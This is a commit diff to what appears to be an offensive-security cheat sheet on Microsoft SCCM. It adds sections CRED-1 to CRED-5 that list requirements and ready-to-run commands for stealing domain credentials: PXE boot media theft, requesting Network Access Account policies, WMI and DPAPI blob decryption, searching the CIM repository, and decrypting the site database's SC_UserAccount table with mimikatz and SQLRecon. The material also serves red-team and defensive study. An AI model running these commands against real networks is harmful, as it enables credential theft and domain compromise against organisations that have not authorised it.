SCCM - CRED1 to CRED5
parent
7257e153b8
commit
1cee3b6738
|
@ -63,36 +63,6 @@
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Network Access Accounts
|
|
||||||
|
|
||||||
> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
|
|
||||||
|
|
||||||
On the machine
|
|
||||||
|
|
||||||
* Find SCCM blob
|
|
||||||
```ps1
|
|
||||||
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
|
|
||||||
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
|
|
||||||
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
|
|
||||||
```
|
|
||||||
* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
|
|
||||||
```ps1
|
|
||||||
.\SharpDPAPI.exe SCCM
|
|
||||||
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
|
|
||||||
```
|
|
||||||
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
|
|
||||||
```ps1
|
|
||||||
Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
|
|
||||||
ConvertFrom-SddlString ""
|
|
||||||
```
|
|
||||||
|
|
||||||
From a remote machine.
|
|
||||||
* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter)
|
|
||||||
```ps1
|
|
||||||
python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
## SCCM Shares
|
## SCCM Shares
|
||||||
|
|
||||||
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
|
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
|
||||||
|
@ -105,6 +75,145 @@ From a remote machine.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Configuration Manager
|
||||||
|
|
||||||
|
### CRED-1 Retrieve credentials via PXE boot media
|
||||||
|
|
||||||
|
* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
|
||||||
|
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
|
||||||
|
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
|
||||||
|
* PXE-enabled distribution point
|
||||||
|
|
||||||
|
Exploitation:
|
||||||
|
|
||||||
|
* [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
|
||||||
|
```ps1
|
||||||
|
sudo python3 pxethiefy.py explore -i eth0
|
||||||
|
```
|
||||||
|
* [MWR-CyberSec/PXEThief](https://github.com/MWR-CyberSec/PXEThief)
|
||||||
|
|
||||||
|
|
||||||
|
### CRED-2 Request a policy containing credentials
|
||||||
|
|
||||||
|
* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
|
||||||
|
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
|
||||||
|
* PKI certificates are not required for client authentication
|
||||||
|
* Domain accounts credential
|
||||||
|
|
||||||
|
Exploitation:
|
||||||
|
|
||||||
|
Create a machine or compromise an existing one, then request policies such as `NAAConfig`
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
SharpSCCM get secrets -u <username-machine-$> -p <password>
|
||||||
|
SharpSCCM get naa
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs and decrypt
|
||||||
|
|
||||||
|
> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
|
||||||
|
|
||||||
|
* [Misconfiguration-Manager - CRED-3](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-3/cred-3_description.md)
|
||||||
|
|
||||||
|
|
||||||
|
**Requirements**:
|
||||||
|
|
||||||
|
* Local administrator privileges on an SCCM client
|
||||||
|
|
||||||
|
|
||||||
|
**Exploitation**:
|
||||||
|
|
||||||
|
* Find SCCM blob
|
||||||
|
```ps1
|
||||||
|
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
|
||||||
|
NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
|
||||||
|
NetworkAccessUsername : <![CDATA[E600000001...00F92]]>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244)
|
||||||
|
```ps1
|
||||||
|
$str = "060...F2DAF"
|
||||||
|
$bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++}
|
||||||
|
$b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
|
||||||
|
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
* Using [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption
|
||||||
|
```ps1
|
||||||
|
.\SharpSCCM.exe local secrets -m wmi
|
||||||
|
```
|
||||||
|
|
||||||
|
From a remote machine.
|
||||||
|
|
||||||
|
* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter)
|
||||||
|
```ps1
|
||||||
|
python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### CRED-4 Extract legacy credentials stored as DPAPI blobs and decrypt
|
||||||
|
|
||||||
|
* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
|
||||||
|
|
||||||
|
**Requirements**:
|
||||||
|
|
||||||
|
* Local administrator privileges on an SCCM client
|
||||||
|
|
||||||
|
|
||||||
|
**Exploitation**:
|
||||||
|
|
||||||
|
* Search the database using `SharpDPAPI`
|
||||||
|
```ps1
|
||||||
|
.\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA
|
||||||
|
```
|
||||||
|
|
||||||
|
* Search the database using `SharpSCCM`
|
||||||
|
```ps1
|
||||||
|
.\SharpSCCM.exe local secrets -m disk
|
||||||
|
```
|
||||||
|
|
||||||
|
* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`:
|
||||||
|
```ps1
|
||||||
|
Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
|
||||||
|
ConvertFrom-SddlString ""
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
### CRED-5 Extract and decrypt the SC_UserAccount table from the site database
|
||||||
|
|
||||||
|
* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)
|
||||||
|
|
||||||
|
**Requirements**:
|
||||||
|
|
||||||
|
* Site database access
|
||||||
|
* Primary site server access
|
||||||
|
* Access to the private key used for encryption
|
||||||
|
|
||||||
|
**Exploitation**:
|
||||||
|
|
||||||
|
* [gentilkiwi/mimikatz](https://twitter.com/gentilkiwi/status/1392204021461569537)
|
||||||
|
```ps1
|
||||||
|
mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;"
|
||||||
|
```
|
||||||
|
* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon), only if the site server and database are hosted on the same system
|
||||||
|
```ps1
|
||||||
|
SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials
|
||||||
|
```
|
||||||
|
* SQLRecon + [xpn/sccmdecryptpoc.cs](https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1)
|
||||||
|
```ps1
|
||||||
|
SQLRecon.exe /auth:WinToken /host:<SITE-DB> /database:CM_<SITECODE> /module:query /command:"SELECT * FROM SC_UserAccount"
|
||||||
|
sccmdecryptpoc.exe 0C010000080[...]5D6F0
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
|
* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/)
|
||||||
|
@ -113,3 +222,4 @@ From a remote machine.
|
||||||
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
||||||
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
|
* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
|
||||||
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
|
* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
|
||||||
|
* [Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024](https://posts.specterops.io/misconfiguration-manager-overlooked-and-overprivileged-70983b8f350d)
|
Loading…
Reference in New Issue